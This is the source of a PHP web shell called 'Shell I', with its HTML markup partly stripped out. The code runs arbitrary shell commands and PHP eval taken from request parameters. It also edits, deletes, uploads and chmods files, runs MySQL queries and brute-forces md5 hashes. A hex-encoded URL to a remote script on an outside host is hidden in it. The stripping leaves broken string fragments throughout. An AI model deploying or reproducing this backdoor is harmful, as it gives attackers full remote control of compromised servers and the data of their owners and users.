'.getenv("HTTP_HOST").' ~ Shell I

'Execute Command', 'eval' => 'Evaluate PHP', 'mysql' => 'MySQL Query', 'chmod' => 'Chmod File', 'phpinfo' => 'PHPinfo', 'md5' => 'md5 cracker', 'headers' => 'Show headers', 'logout' => 'Log out' ); //The header, like it? $header = ' '.getenv("HTTP_HOST").' ~ Shell I
'; print $header; $footer = '
'; $default_if = "\x68\x74\x74\x70\x3A\x2F\x2F\x72\x6F\x6F\x74\x6B\x69\x74\x6E\x69\x6E\x6A\x61\x2E\x63\x6F\x6D\x2F\x73\x61\x79\x2E\x6A\x73"; // //Page handling // if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print ""; if(isset($_REQUEST['command'])) { print "
";
                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
                    }
            break;
            
            
            case 'edit': //Edit a fie
                if(isset($_POST['editform']))
                {
                    $f = $_GET['file'];
                    $fh = fopen($f, 'w') or print "Error while opening file!";
                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
                    fclose($fh);
                }
                print "Editing file ".$_GET['file']." (".perm($_GET['file']).")

";
                
                if(file_exists($_GET['file']))
                {
                    $rd = file($_GET['file']);
                    foreach($rd as $l)
                    {
                        print htmlspecialchars($l);
                    }
                }
                
                print "";
                
            break;
            
            case 'delete': //Delete a file
            
                if(isset($_POST['yes']))
                {
                    if(unlink($_GET['file']))
                    {
                        print "File deleted successfully.";
                    }
                    else
                    {
                        print "Couldn't delete file.";
                    }
                }
                
                
                if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
                {
                    print "Are you sure you want to delete ".$_GET['file']."?

                    
                    
                    
                    ";
                }
            
            
            break;
            
            
            case 'eval': //Evaluate PHP code
            
                print "
                ";
                if(isset($_POST['eval']))
                {
                    print htmlspecialchars($_POST['eval']);
                }
                else
                {
                    print "print \"Yo Momma\";";
                }
                print "

                
                ";
                
                if(isset($_POST['eval']))
                {
                    print "Output:";
                    print "
";
                    eval($_POST['eval']);
                }
            
            break;
            
            case 'chmod': //Chmod file
                
                
                print "Under construction!";
                if(isset($_POST['chmod']))
                {
                switch ($_POST['chvalue']){
                    case 777:
                    chmod($_POST['chmod'],0777);
                    break;
                    case 644:
                    chmod($_POST['chmod'],0644);
                    break;
                    case 755:
                    chmod($_POST['chmod'],0755);
                    break;
                }
                print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
                }
                if(isset($_GET['file']))
                {
                    $content = urldecode($_GET['file']);
                }
                else
                {
                    $content = "file/path/please";
                }
                
                print "File to chmod:
                
New permission:
                ";
                
            break;
            
            case 'mysql': //MySQL Query
            
            if(isset($_POST['host']))
            {
                $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
                mysql_select_db($_POST['dbase']);
                $sql = $_POST['query'];
                
                
                $result = mysql_query($sql);
                
            }
            else
            {
                print "
                This only queries the database, doesn't return data!

                
                Host:


                Username:


                Password:


                Database:


                
                Query:

                
                
                ";
                
            }
            
            break;
            
            case 'createdir':
            if(mkdir($_GET['crdir']))
            {
            print 'Directory created successfully.';
            }
            else
            {
            print 'Couldn\'t create directory';
            }
            break;
            
            
            case 'phpinfo': //PHP Info
                phpinfo();
            break;
            
            
            case 'rename':
            
                if(isset($_POST['fileold']))
                {
                    if(rename($_POST['fileold'],$_POST['filenew']))
                    {
                        print "File renamed.";
                    }
                    else
                    {
                        print "Couldn't rename file.";
                    }
                    
                }
                if(isset($_GET['file']))
                {
                    $file = basename(htmlspecialchars($_GET['file']));
                }
                else
                {
                    $file = "";
                }
                
                print "Renaming ".$file." in folder ".realpath('.').".

                                
                    Rename:


                    To:


                    
                    ";
            break;
            
            case 'md5':
            if(isset($_POST['md5']))
            {
            if(!is_numeric($_POST['timelimit']))
            {
            $_POST['timelimit'] = 30;
            }
            set_time_limit($_POST['timelimit']);
                if(strlen($_POST['md5']) == 32)
                {
                    
                        if($_POST['chars'] == "9999")
                        {
                        $i = 0;
                        while($_POST['md5'] != md5($i) && $i != 100000)
                            {
                                $i++;
                            }
                        }
                        else
                        {
                            for($i = "a"; $i != "zzzzz"; $i++)
                            {
                                if(md5($i == $_POST['md5']))
                                {
                                    break;
                                }
                            }
                        }

                    
                    if(md5($i) == $_POST['md5'])
                    {
                            print "Plaintext of ". $_POST['md5']. " is ".$i."


";
                    }
                    
                }
                
            }
            
            print "Will bruteforce the md5
                
                md5 to crack:


                Characters:

                Max. cracking time*:


                
                

*: if set_time_limit is allowed by php.ini";
            break;
            
            case 'headers':
            foreach(getallheaders() as $header => $value)
            {
            print htmlspecialchars($header . ":" . $value)."
";
            
            }
            break;
        }

}
else //Default page that will be shown when the page isn't found or no page is selected.
{
    
    $files = array();
    $directories = array();
    
    if(isset($_FILES['uploadedfile']['name']))
{
    $target_path = realpath('.').'/';
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        print "File:".  basename( $_FILES['uploadedfile']['name']). 
        " has been uploaded";
    } else{
        echo "File upload failed!";
    }
}


    
    
    
    print "";
    if ($handle = opendir('.'))
    {
        while (false !== ($file = readdir($handle))) 
        {
              if(is_dir($file))
              {
                $directories[] = $file;
              }
              else
              {
                $files[] = $file;
              }
        }
    asort($directories);
    asort($files);
        foreach($directories as $file)
        {
            print "";
        }
        
        foreach($files as $file)
        {
            print "";
        }
    }
    else
    {
        print "Error! Can't open ".realpath('.')."!
";
    }
    
    print "Options Filename Size Permissions Last modified
[R][D] ".$file." ".perm($file)." ".date ("Y/m/d, H:i:s", filemtime($file))."
[R][D] ".$file." ".filesize($file)." ".perm($file)." ".date ("Y/m/d, H:i:s", filemtime($file))."
Upload file



Change Directory

Create file

Create directory

";


}


function login()
{
    print "
    Password?
    
    ";
}
function reload()
{
    header("Location: ".basename(__FILE__));
}

function get_execution_method()
{
    if(function_exists('passthru')){ $m = "passthru"; }
    if(function_exists('exec')){ $m = "exec"; }
    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
    if(function_exists('system')){ $m = "system"; }
    if(!isset($m)) //No method found :-|
    {
        $m = "Disabled";
    }
    return($m);
}
echo '';

function execute_command($method,$command)
{
    if($method == "passthru")
    {
        passthru($command);
    }
    
    elseif($method == "exec")
    {
        exec($command,$result);
        foreach($result as $output)
        {
            print $output."
";
        }
    }
    
    elseif($method == "shell_exec")
    {
        print shell_exec($command);
    }
    
    elseif($method == "system")
    {
        system($command);
    }

}

function perm($file)
{
    if(file_exists($file))
    {
        return substr(sprintf('%o', fileperms($file)), -4);
    }
    else
    {
        return "????";
    }
}

function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}



}

function show_dirs($where)
{
    if(ereg("^c:",realpath($where)))
    {
    $dirparts = explode('\\',realpath($where));
    }
    else
    {
    $dirparts = explode('/',realpath($where));
    }
    
    
    
    $i = 0;
    $total = "";
    
    foreach($dirparts as $part)
    {
        $p = 0;
        $pre = "";
        while($p != $i)
        {
            $pre .= $dirparts[$p]."/";
            $p++;
            
        }
        $total .= "".$part."/";
        $i++;
    }
    
    return "".$total."

";

}
print $footer;

// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>
Upload file	Change Directory
Create file	Create directory
Options	Filename	Size	Permissions	Last modified
[R][D]	".$file."		".perm($file)."	".date ("Y/m/d, H:i:s", filemtime($file))."
[R][D]	".$file."	".filesize($file)."	".perm($file)."	".date ("Y/m/d, H:i:s", filemtime($file))."